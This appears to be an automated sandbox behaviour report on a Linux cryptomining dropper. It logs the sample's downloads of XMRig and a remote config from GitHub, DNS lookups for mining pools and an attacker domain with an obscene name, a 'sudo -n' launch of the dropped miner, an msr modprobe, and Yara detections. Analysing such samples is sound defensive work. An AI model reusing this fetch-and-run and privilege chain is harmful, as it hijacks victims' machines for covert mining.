            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1Host: api.ipify.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /github-production-release-asset-2e65be/88327406/d0ce794d-b593-4f8f-bb2d-6bfa0096266b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240918%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240918T061708Z&X-Amz-Expires=300&X-Amz-Signature=00531079fb788ace60d0eb8b92c6dc27d7d59c703c0049561047ae2f2958161a&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=88327406&response-content-disposition=attachment%3B%20filename%3Dxmrig-6.21.3-linux-static-x64.tar.gz&response-content-type=application%2Foctet-stream HTTP/1.1Host: objects.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gzAccept-Encoding: gzip
            Source: global trafficHTTP traffic detected: GET /spetterman66/verynicerepo/main/config.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
            Source: global trafficDNS traffic detected: DNS query: vmtracker.freechildporninthisserver.lol
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: objects.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: pool.supportxmr.com
            Source: global trafficDNS traffic detected: DNS query: pool-fr.supportxmr.com
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl/etc/ssl/certs/GlobalSign_Root_CA_-_R3.pem/etc/ssl/certs/Global
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://ocsp.accv.es
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://ocsp.accv.es0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://ocsp.accv.es060102150405Z0700060102150405Z0700rking060102150405Z0700um060102150405Z0700Affirm
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://policy.camerfirma.com0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://repository.swisssign.com/0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0D1
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.accv.es00
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.quovadis.bm0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://api.ipify.org?format=text
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://api.ipify.org?format=textcpu
            Source: xmrig.12.drString found in binary or memory: https://gcc.gnu.org/bugsrg/bugs/):
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://github.com
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-linux-static-x64.tar.gz
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://github.commissing
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/88327406/d0ce794d-b593-
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://raw.githubusercontent.com/spetterman66/verynicerepo/main/config.json/tmp/xmrig
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://vmtracker.freechildporninthisserver.lol/postgresqlstore
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://www.catcert.net/verarrel
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://www.ubuntu.com/legal/terms-and-policies/privacy-policy
            Source: xmr_linux_amd64.elf, 5411.1.000000c000000000.000000c000800000.rw-.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
            Source: xmrig.12.drString found in binary or memory: https://xmrig.com/benchmark/%s
            Source: xmrig.12.drString found in binary or memory: https://xmrig.com/docs/algorithms
            Source: xmrig.12.drString found in binary or memory: https://xmrig.com/wizard
            Source: xmrig.12.drString found in binary or memory: https://xmrig.com/wizard%s
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42184
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51558
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42182
            Source: unknownNetwork traffic detected: HTTP traffic on port 59946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51556
            Source: unknownNetwork traffic detected: HTTP traffic on port 54894 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51558 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42182 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51556 -> 443

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPEDMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig, type: DROPPEDMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: xmr_linux_amd64.elfBinary or memory string: _kSzU_o.SlNN8jbSTO
            Source: classification engineClassification label: mal100.troj.evad.mine.linELF@0/6@61/0
            Source: ELF file sectionSubmission: xmr_linux_amd64.elf

            Persistence and Installation Behavior

            barindex
            Sample reads /proc/mounts (often used for finding a writable filesystem)
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)File: /proc/5453/mountsJump to behavior
            Source: /usr/bin/sudo (PID: 5427)File: /home/saturnino/.sudo_as_admin_successfulJump to behavior
            Source: /usr/bin/sudo (PID: 5452)File: /home/saturnino/.sudo_as_admin_successfulJump to behavior
            Source: /usr/bin/sudo (PID: 5452)Empty hidden file: /home/saturnino/.sudo_as_admin_successfulJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/230/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/110/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/231/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/111/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/232/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/112/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/233/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/113/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/234/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/114/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/235/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/115/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/236/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/116/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/237/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/117/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/238/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/118/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/239/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/119/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/914/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/10/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/917/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/11/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/12/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/13/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/14/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/15/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/5397/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/16/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/5398/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/17/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/18/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/19/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/240/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/3095/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/120/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/241/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/121/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/242/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1/environJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/122/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/243/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/2/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/123/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/244/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/3/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/124/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/245/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1588/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/125/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/4/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/246/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/126/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/5/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/247/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/127/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/6/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/248/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/128/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/7/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/249/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/129/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/8/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/800/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/9/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1906/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/802/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/803/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/20/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/21/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/22/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/23/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/24/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/25/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/26/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/27/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/28/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/29/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/3420/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1482/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/490/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1480/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/250/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/371/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/130/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/251/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/131/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/252/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/132/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/253/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/254/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1238/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/134/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/255/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/256/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/257/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/378/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/3413/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/258/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/259/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/1475/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/936/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File opened: /proc/30/statJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5475)Shell command executed: sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"Jump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5427)Sudo executable: /usr/bin/sudo -> sudo -n trueJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5452)Sudo executable: /usr/bin/sudo -> sudo -n /tmp/xmrig/xmrig-6.21.3/xmrigJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Reads from proc file: /proc/statJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Reads from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads from proc file: /proc/meminfoJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File: /tmp/xmrig/xmrig-6.21.3/xmrig (bits: - usr: rwx grp: rwx all: rwx)Jump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)File written: /tmp/xmrig/xmrig-6.21.3/xmrigJump to dropped file
            Source: /bin/sh (PID: 5476)Modprobe: /sbin/modprobe -> /sbin/modprobe msr allow_writes=onJump to behavior
            Source: /tmp/xmr_linux_amd64.elf (PID: 5411)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_mapJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/levelJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/typeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_sizeJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_setsJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partitionJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpusJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_idJump to behavior
            Source: /tmp/xmrig/xmrig-6.21.3/xmrig (PID: 5453)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpusJump to behavior
